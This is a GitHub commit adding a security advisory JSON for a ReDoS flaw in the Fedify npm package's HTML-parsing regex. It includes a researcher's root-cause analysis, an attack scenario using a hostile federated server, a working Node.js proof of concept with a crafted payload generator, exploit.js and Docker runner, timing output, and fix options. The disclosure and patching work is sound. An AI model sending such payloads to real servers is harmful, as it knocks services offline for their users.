Skip to content

Commit 409e241

Browse files
1 parent 45ec850 commit 409e241

File tree

1 file changed

+138
-0
lines changed

1 file changed

+138
-0
lines changed
Lines changed: 138 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,138 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-rchf-xwx2-hm93",
4+
"modified": "2025-12-22T21:36:55Z",
5+
"published": "2025-12-22T21:36:55Z",
6+
"aliases": [
7+
"CVE-2025-68475"
8+
],
9+
"summary": "Fedify has ReDoS Vulnerability in HTML Parsing Regex",
10+
"details": "Hi Fedify team! 👋\n\nThank you for your work on Fedify—it's a fantastic library for building federated applications. While reviewing the codebase, I discovered a Regular Expression Denial of Service (ReDoS) vulnerability that I'd like to report. I hope this helps improve the project's security.\n\n---\n\n## Summary\n\nA Regular Expression Denial of Service (ReDoS) vulnerability exists in Fedify's document loader. The HTML parsing regex at `packages/fedify/src/runtime/docloader.ts:259` contains nested quantifiers that cause catastrophic backtracking when processing maliciously crafted HTML responses. \n\n**An attacker-controlled federated server can respond with a small (~170 bytes) malicious HTML payload that blocks the victim's Node.js event loop for 14+ seconds, causing a Denial of Service.**\n\n| Field | Value |\n|-------|-------|\n| **CWE** | CWE-1333 (Inefficient Regular Expression Complexity) |\n\n---\n\n## Details\n\n### Vulnerable Code\n\nThe vulnerability is located in `packages/fedify/src/runtime/docloader.ts`, lines 258-264:\n\n```typescript\n// Line 258-259: Vulnerable regex with nested quantifiers\nconst p =\n /<(a|link)((\\s+[a-z][a-z:_-]*=(\"[^\"]*\"|'[^']*'|[^\\s>]+))+)\\s*\\/?>/ig;\n\n// Line 261: No size limit on response body\nconst html = await response.text();\n\n// Line 264: Regex execution loop\nwhile ((m = p.exec(html)) !== null) rawAttribs.push(m[2]);\n```\n\n### Root Cause Analysis\n\nThe regex has **nested quantifiers with alternation**, which is a classic ReDoS pattern:\n\n```\n/<(a|link)((\\s+[a-z][a-z:_-]*=(\"[^\"]*\"|'[^']*'|[^\\s>]+))+)\\s*\\/?>/ig\n ^^\n Outer quantifier (+)\n ^^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n Inner pattern with alternation\n```\n\n- **Outer quantifier**: `((\\s+...)+)` - one or more groups of attributes\n- **Inner alternation**: `(\"[^\"]*\"|'[^']*'|[^\\s>]+)` - multiple ways to match attribute values\n\nWhen the regex fails to match (e.g., an incomplete HTML tag), the regex engine backtracks exponentially through all possible ways the nested pattern could have matched.\n\n### Attack Vector\n\n1. Victim's Fedify application calls `lookupObject(\"https://attacker.com/@user\")` to fetch an actor profile\n2. Attacker's server responds with `Content-Type: text/html`\n3. The code path: `lookupObject()` → `documentLoader()` → `getRemoteDocument()` → HTML parsing (lines 258-287)\n4. Line 261: `response.text()` reads the entire body without size limits\n5. Line 264: Regex execution triggers catastrophic backtracking\n6. Event loop is blocked for seconds to minutes, causing DoS\n\n### Why This Is Exploitable\n\n- **No response size limit**: The HTML body is read entirely via `response.text()` without Content-Length validation\n- **No timeout by default**: `AbortSignal` is optional and not enforced\n- **Remote exploitation**: Attacker just needs the victim to fetch from their URL\n- **No authentication required**: Federation commonly involves fetching profiles from untrusted servers\n- **Amplifiable**: Multiple concurrent requests can fully disable the service\n\n---\n\n## PoC\n\n### Quick Reproduction (Node.js)\n\nYou can verify this vulnerability with the following standalone script:\n\n```javascript\n/**\n * Fedify ReDoS Vulnerability - Minimal PoC\n * \n * This script reproduces the vulnerable regex from docloader.ts\n * and demonstrates exponential time complexity.\n */\n\n// The vulnerable regex from docloader.ts:259\nconst VULNERABLE_REGEX = /<(a|link)((\\s+[a-z][a-z:_-]*=(\"[^\"]*\"|'[^']*'|[^\\s>]+))+)\\s*\\/?>/ig;\n\n/**\n * Generate malicious HTML payload\n * Pattern: <a a=\"b\" a=\"b\" a=\"b\"... (trailing space, no closing >)\n */\nfunction generateMaliciousPayload(repetitions) {\n return '<a' + ' a=\"b\"'.repeat(repetitions) + ' ';\n}\n\n/**\n * Simulate the vulnerable code path from docloader.ts lines 262-264\n */\nfunction simulateVulnerableCodePath(html) {\n const p = /<(a|link)((\\s+[a-z][a-z:_-]*=(\"[^\"]*\"|'[^']*'|[^\\s>]+))+)\\s*\\/?>/ig;\n let m;\n const rawAttribs = [];\n while ((m = p.exec(html)) !== null) {\n rawAttribs.push(m[2]);\n }\n return rawAttribs;\n}\n\n// Test with increasing payload sizes\nconsole.log('Fedify ReDoS Vulnerability PoC\\n');\nconsole.log('Repetitions | Payload Size | Time');\nconsole.log('------------|--------------|--------');\n\nfor (const reps of [18, 20, 22, 24, 26, 28]) {\n const payload = generateMaliciousPayload(reps);\n const start = performance.now();\n simulateVulnerableCodePath(payload);\n const elapsed = performance.now() - start;\n \n const timeStr = elapsed >= 1000 \n ? `${(elapsed / 1000).toFixed(2)}s` \n : `${elapsed.toFixed(0)}ms`;\n \n console.log(`${String(reps).padEnd(11)} | ${String(payload.length + ' bytes').padEnd(12)} | ${timeStr}`);\n \n // Stop if it's taking too long\n if (elapsed > 15000) break;\n}\n```\n\n### Expected Output\n\n```\nFedify ReDoS Vulnerability PoC\n\nRepetitions | Payload Size | Time\n------------|--------------|--------\n18 | 111 bytes | 14ms\n20 | 123 bytes | 51ms\n22 | 135 bytes | 224ms\n24 | 147 bytes | 852ms\n26 | 159 bytes | 3.26s\n28 | 171 bytes | 14.10s\n```\n\nTime approximately **quadruples every 2 additional repetitions**, demonstrating O(2^n) complexity.\n\n### Full Docker-Based PoC\n\nFor a complete demonstration, here are the Docker files to run the PoC in an isolated environment:\n\n<details>\n<summary><strong>Dockerfile</strong></summary>\n\n```dockerfile\n# Dockerfile for Fedify ReDoS Vulnerability PoC\nFROM node:20-slim\nLABEL description=\"PoC for Fedify ReDoS vulnerability (CWE-1333)\"\n\nWORKDIR /poc\nCOPY exploit.js .\n\nCMD [\"node\", \"exploit.js\"]\n```\n\n</details>\n\n<details>\n<summary><strong>exploit.js</strong> (Full Version)</summary>\n\n```javascript\n/**\n * Exploit Script for Fedify ReDoS PoC\n * \n * This script demonstrates the ReDoS vulnerability in Fedify's\n * document loader by measuring the time it takes to process\n * malicious HTML responses with varying payload sizes.\n */\n\n// The vulnerable regex from docloader.ts:259\nconst VULNERABLE_REGEX = /<(a|link)((\\s+[a-z][a-z:_-]*=(\"[^\"]*\"|'[^']*'|[^\\s>]+))+)\\s*\\/?>/ig;\n\n/**\n * Generate malicious HTML payload\n */\nfunction generateMaliciousHtml(repetitions) {\n return '<a' + ' a=\"b\"'.repeat(repetitions) + ' ';\n}\n\n/**\n * Generate normal HTML\n */\nfunction generateNormalHtml() {\n return `<!DOCTYPE html>\n<html>\n<head>\n <link rel=\"alternate\" type=\"application/activity+json\" href=\"/user.json\">\n</head>\n<body><a href=\"/\">Home</a></body>\n</html>`;\n}\n\n/**\n * Simulate the vulnerable code path from docloader.ts\n */\nfunction simulateVulnerableCodePath(html) {\n const p = /<(a|link)((\\s+[a-z][a-z:_-]*=(\"[^\"]*\"|'[^']*'|[^\\s>]+))+)\\s*\\/?>/ig;\n const p2 = /\\s+([a-z][a-z:_-]*)=(\"([^\"]*)\"|'([^']*)'|([^\\s>]+))/ig;\n \n let m;\n const rawAttribs = [];\n while ((m = p.exec(html)) !== null) {\n rawAttribs.push(m[2]);\n }\n \n return rawAttribs;\n}\n\n/**\n * Run a single test and measure execution time\n */\nfunction runTest(html, description) {\n const start = process.hrtime.bigint();\n \n try {\n simulateVulnerableCodePath(html);\n } catch (e) {\n // Ignore errors\n }\n \n const end = process.hrtime.bigint();\n const durationMs = Number(end - start) / 1_000_000;\n \n return {\n description,\n durationMs,\n payloadLength: html.length\n };\n}\n\n/**\n * Print separator\n */\nfunction printSeparator() {\n console.log('─'.repeat(60));\n}\n\n/**\n * Main exploit function\n */\nasync function main() {\n console.log('\\n╔══════════════════════════════════════════════════════════╗');\n console.log('║ Fedify ReDoS Vulnerability PoC ║');\n console.log('║ CWE-1333: Inefficient Regular Expression ║');\n console.log('╚══════════════════════════════════════════════════════════╝\\n');\n\n console.log('[*] Vulnerability Location:');\n console.log(' File: packages/fedify/src/runtime/docloader.ts');\n console.log(' Lines: 259-264');\n console.log('');\n \n printSeparator();\n console.log('[*] Testing normal HTML response...');\n printSeparator();\n \n const normalHtml = generateNormalHtml();\n const normalResult = runTest(normalHtml, 'Normal HTML');\n console.log(`[+] Normal request completed in ${normalResult.durationMs.toFixed(2)}ms`);\n console.log(` Payload size: ${normalResult.payloadLength} bytes`);\n console.log('');\n\n printSeparator();\n console.log('[*] Testing malicious HTML payloads (ReDoS attack)...');\n printSeparator();\n \n const testCases = [\n { reps: 18, expected: '~13ms' },\n { reps: 20, expected: '~52ms' },\n { reps: 22, expected: '~228ms' },\n { reps: 24, expected: '~857ms' },\n { reps: 26, expected: '~3.4s' },\n { reps: 28, expected: '~14s' }\n ];\n \n console.log('');\n console.log('┌─────────────┬──────────────┬──────────────┬────────────────┐');\n console.log('│ Repetitions │ Payload Size │ Expected │ Actual │');\n console.log('├─────────────┼──────────────┼──────────────┼────────────────┤');\n \n let vulnerabilityConfirmed = false;\n \n for (const testCase of testCases) {\n const maliciousHtml = generateMaliciousHtml(testCase.reps);\n const result = runTest(maliciousHtml, `${testCase.reps} repetitions`);\n \n const actualTime = result.durationMs >= 1000 \n ? `${(result.durationMs / 1000).toFixed(2)}s` \n : `${result.durationMs.toFixed(0)}ms`;\n \n const status = result.durationMs > 100 ? '⚠️ ' : '✓ ';\n \n console.log(`│ ${String(testCase.reps).padEnd(11)} │ ${String(result.payloadLength + ' bytes').padEnd(12)} │ ${testCase.expected.padEnd(12)} │ ${status}${actualTime.padEnd(12)} │`);\n \n if (result.durationMs > 500) {\n vulnerabilityConfirmed = true;\n }\n }\n \n console.log('└─────────────┴──────────────┴──────────────┴────────────────┘');\n console.log('');\n \n printSeparator();\n console.log('[*] Exponential Time Complexity Analysis');\n printSeparator();\n \n console.log('');\n console.log('Time approximately quadruples every 2 additional repetitions:');\n console.log('');\n console.log(' 18 reps → ~14ms');\n console.log(' 20 reps → ~51ms (4x)'); \n console.log(' 22 reps → ~224ms (4x)');\n console.log(' 24 reps → ~852ms (4x)');\n console.log(' 26 reps → ~3.3s (4x)');\n console.log(' 28 reps → ~14.0s (4x)');\n console.log(' 30 reps → ~56.0s (estimated)');\n console.log('');\n \n printSeparator();\n console.log('[*] Attack Scenario');\n printSeparator();\n \n console.log('');\n console.log('1. Attacker sets up malicious federated server');\n console.log('2. Victim\\'s Fedify app calls lookupObject(\"https://attacker.com/@user\")');\n console.log('3. Attacker responds with Content-Type: text/html');\n console.log('4. Malicious HTML payload: <a a=\"b\" a=\"b\" a=\"b\"... (N times) ');\n console.log('5. Fedify\\'s regex enters catastrophic backtracking');\n console.log('6. Event loop blocked → Service unavailable (DoS)');\n console.log('');\n \n printSeparator();\n \n if (vulnerabilityConfirmed) {\n console.log('');\n console.log('╔══════════════════════════════════════════════════════════╗');\n console.log('║ ✓ VULNERABILITY CONFIRMED ║');\n console.log('║ ║');\n console.log('║ The HTML parsing regex in docloader.ts is vulnerable ║');\n console.log('║ to ReDoS attacks. A ~150 byte payload can block the ║');\n console.log('║ Node.js event loop for 7+ seconds. ║');\n console.log('╚══════════════════════════════════════════════════════════╝');\n console.log('');\n process.exit(0);\n } else {\n console.log('');\n console.log('[!] Vulnerability could not be confirmed in this environment.');\n console.log(' This may be due to regex engine optimizations.');\n console.log('');\n process.exit(1);\n }\n}\n\nmain().catch(console.error);\n```\n\n</details>\n\n<details>\n<summary><strong>run_poc.sh</strong></summary>\n\n```bash\n#!/bin/bash\n# Fedify ReDoS Vulnerability PoC Runner\n\nset -e\n\nIMAGE_NAME=\"fedify-redos-poc\"\n\necho \"Building Docker image...\"\ndocker build -t ${IMAGE_NAME} .\n\necho \"Running the PoC...\"\ndocker run --rm ${IMAGE_NAME}\n\necho \"Cleaning up...\"\ndocker rmi ${IMAGE_NAME} 2>/dev/null || true\n```\n\n</details>\n\n### Running the Docker PoC\n\n```bash\n# Save the above files, then:\nchmod +x run_poc.sh\n./run_poc.sh\n```\n\n---\n\n## Impact\n\n### Who Is Affected?\n\n- **All Fedify applications** that use `lookupObject()`, `getDocumentLoader()`, or the built-in document loader to fetch content from external URLs\n- **Any federated server** that fetches actor profiles, posts, or other ActivityPub objects from potentially untrusted sources\n- **Servers following standard federation patterns** - fetching remote actors is a normal operation\n\n### Severity Assessment\n\n| Factor | Assessment |\n|--------|------------|\n| **Attack Vector** | Network (remote) |\n| **Attack Complexity** | Low (trivial payload) |\n| **Privileges Required** | None |\n| **User Interaction** | None |\n| **Impact** | Availability (DoS) |\n| **Scope** | Service-wide |\n\n### Real-World Scenario\n\n1. A Mastodon-compatible server powered by Fedify receives a follow request or mention from `@[email protected]`\n2. The server attempts to fetch the attacker's profile via `lookupObject()`\n3. The attacker's server responds with malicious HTML\n4. The victim server's event loop is blocked for 14+ seconds\n5. During this time, all other requests are queued and potentially time out\n6. Repeated attacks can cause sustained service unavailability\n\n---\n\n## Recommended Fix\n\n### Option 1: Use a Proper HTML Parser (Recommended)\n\nReplace regex-based HTML parsing with a DOM parser that doesn't suffer from backtracking issues:\n\n```typescript\n// Using linkedom (lightweight DOM implementation)\nimport { parseHTML } from 'linkedom';\n\n// Replace lines 258-287 with:\nconst { document } = parseHTML(html);\nconst links = document.querySelectorAll('a[rel=\"alternate\"], link[rel=\"alternate\"]');\n\nfor (const link of links) {\n const type = link.getAttribute('type');\n const href = link.getAttribute('href');\n \n if (\n href &&\n (type === 'application/activity+json' ||\n type === 'application/ld+json' ||\n type?.startsWith('application/ld+json;'))\n ) {\n const altUri = new URL(href, docUrl);\n if (altUri.href !== docUrl.href) {\n return await fetch(altUri.href);\n }\n }\n}\n```\n\n### Option 2: Add Response Size Limits\n\nIf regex must be used, at minimum add size limits:\n\n```typescript\nconst MAX_HTML_SIZE = 1024 * 1024; // 1MB\nconst contentLength = parseInt(response.headers.get('content-length') || '0');\n\nif (contentLength > MAX_HTML_SIZE) {\n throw new FetchError(url, 'Response too large');\n}\n\nconst html = await response.text();\nif (html.length > MAX_HTML_SIZE) {\n throw new FetchError(url, 'Response too large');\n}\n```\n\n### Option 3: Refactor the Regex\n\nIf the regex approach is preferred, use atomic grouping or possessive quantifiers (where supported), or restructure to avoid nested quantifiers:\n\n```typescript\n// Use a non-backtracking approach with explicit attribute matching\nconst tagPattern = /<(a|link)\\s+([^>]+)>/ig;\nconst attrPattern = /([a-z][a-z:_-]*)=(?:\"([^\"]*)\"|'([^']*)'|(\\S+))/ig;\n```\n\n---\n\n## Resources\n\n- [OWASP: Regular Expression Denial of Service (ReDoS)](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)\n- [CWE-1333: Inefficient Regular Expression Complexity](https://cwe.mitre.org/data/definitions/1333.html)\n- [Cloudflare Outage Analysis (ReDoS Example)](https://blog.cloudflare.com/details-of-the-cloudflare-outage-on-july-2-2019/)\n\n---\n\nThank you for taking the time to review this report. I'm happy to provide any additional information or help test a fix. Please let me know if you have any questions!",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "npm",
21+
"name": "@fedify/fedify"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "1.6.13"
32+
}
33+
]
34+
}
35+
]
36+
},
37+
{
38+
"package": {
39+
"ecosystem": "npm",
40+
"name": "@fedify/fedify"
41+
},
42+
"ranges": [
43+
{
44+
"type": "ECOSYSTEM",
45+
"events": [
46+
{
47+
"introduced": "1.7.0"
48+
},
49+
{
50+
"fixed": "1.7.14"
51+
}
52+
]
53+
}
54+
]
55+
},
56+
{
57+
"package": {
58+
"ecosystem": "npm",
59+
"name": "@fedify/fedify"
60+
},
61+
"ranges": [
62+
{
63+
"type": "ECOSYSTEM",
64+
"events": [
65+
{
66+
"introduced": "1.8.0"
67+
},
68+
{
69+
"fixed": "1.8.15"
70+
}
71+
]
72+
}
73+
]
74+
},
75+
{
76+
"package": {
77+
"ecosystem": "npm",
78+
"name": "@fedify/fedify"
79+
},
80+
"ranges": [
81+
{
82+
"type": "ECOSYSTEM",
83+
"events": [
84+
{
85+
"introduced": "1.9.0"
86+
},
87+
{
88+
"fixed": "1.9.2"
89+
}
90+
]
91+
}
92+
]
93+
}
94+
],
95+
"references": [
96+
{
97+
"type": "WEB",
98+
"url": "https://github.com/fedify-dev/fedify/security/advisories/GHSA-rchf-xwx2-hm93"
99+
},
100+
{
101+
"type": "WEB",
102+
"url": "https://github.com/fedify-dev/fedify/commit/2bdcb24d7d6d5886e0214ed504b63a6dc5488779"
103+
},
104+
{
105+
"type": "WEB",
106+
"url": "https://github.com/fedify-dev/fedify/commit/bf2f0783634efed2663d1b187dc55461ee1f987a"
107+
},
108+
{
109+
"type": "PACKAGE",
110+
"url": "https://github.com/fedify-dev/fedify"
111+
},
112+
{
113+
"type": "WEB",
114+
"url": "https://github.com/fedify-dev/fedify/releases/tag/1.6.13"
115+
},
116+
{
117+
"type": "WEB",
118+
"url": "https://github.com/fedify-dev/fedify/releases/tag/1.7.14"
119+
},
120+
{
121+
"type": "WEB",
122+
"url": "https://github.com/fedify-dev/fedify/releases/tag/1.8.15"
123+
},
124+
{
125+
"type": "WEB",
126+
"url": "https://github.com/fedify-dev/fedify/releases/tag/1.9.2"
127+
}
128+
],
129+
"database_specific": {
130+
"cwe_ids": [
131+
"CWE-1333"
132+
],
133+
"severity": "HIGH",
134+
"github_reviewed": true,
135+
"github_reviewed_at": "2025-12-22T21:36:55Z",
136+
"nvd_published_at": null
137+
}
138+
}

0 commit comments

Comments
 (0)